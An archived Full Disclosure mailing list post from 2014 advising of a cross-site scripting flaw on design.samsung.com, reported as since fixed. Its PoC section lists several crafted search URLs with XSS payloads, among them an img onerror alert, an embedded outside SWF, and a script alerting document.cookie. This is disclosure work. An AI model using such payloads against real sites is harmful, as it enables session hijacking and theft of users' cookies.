lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 11 Jun 2014 12:33:19 +0200 From: "Roberto Garcia Amoriz" <roberto.garcia@...aramo.com> To: <fulldisclosure@...lists.org> Subject: [FD] XSS on Samsung Site **************************************************************************** *************************************** Advisory: design.samsung.com Cross-Site Script Vulnerability (XSS) Advisory ID: 03062014 Author: Roberto Garcia (@1gbDeInfo) Affected Software: Successfully tested on design.samsung.com Vendor URL: http://www.design.samsung.com Vendor Status: informed and solved **************************************************************************** *************************************** ************************** Vulnerability Description ************************** The website " design.samsung.com " is prone to a XSS vulnerability. This vulnerability involves the ability to inject arbitrary and unauthorized javascript code. A malicious script inserted into a page in this manner can hijack the users session, submit unauthorized transactions as the user, steal confidential information, or simply deface the page. ************************** PoC-Exploit ************************** http://www.design.samsung.com/global/#search?q=data:text/html,/*%3Cimg%20src =x%20%27-alert%280%29-%27%20onerror=alert%281%29%3E*/alert%281%29 http://www.design.samsung.com/global/#search?q=http://goo.gl/58yW2K http://www.design.samsung.com/global/#search?q=%3Cembed/src=//v.ifeng.com/in clude/exterior.swf?AutoPlay=false&guid=045d77fb-6777-405f-8b66-5bd85afc16ea% 20allowScriptAccess=always%3E http://www.design.samsung.com/global/#search?q=%E2%80%9C%3E%3Cscript%3Ealert %28document.cookie%29%3C/script%3E PoC video is available at https://mega.co.nz/#F!Ot5kERSS!5If3znRA2IOnAOrMZAAnlw ************************** Solution ************************** Solved, but have not notified me anything ************************** Disclosure Timeline ************************** - Report vuln Jun 03, 2014 via email to askdesign@...sung.com. I sent a video with the POC. - Website revised June 10. Solved, but nobody tells me ************************** Credits ************************** Vulnerability found and advisory written by Roberto Garcia Best regards. Roberto Garcia Amoriz Linkedin: es.linkedin.com/in/rogaramo/ Web: http://www.1gbdeinformacion.com Twitter: @1gbdeinfo _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists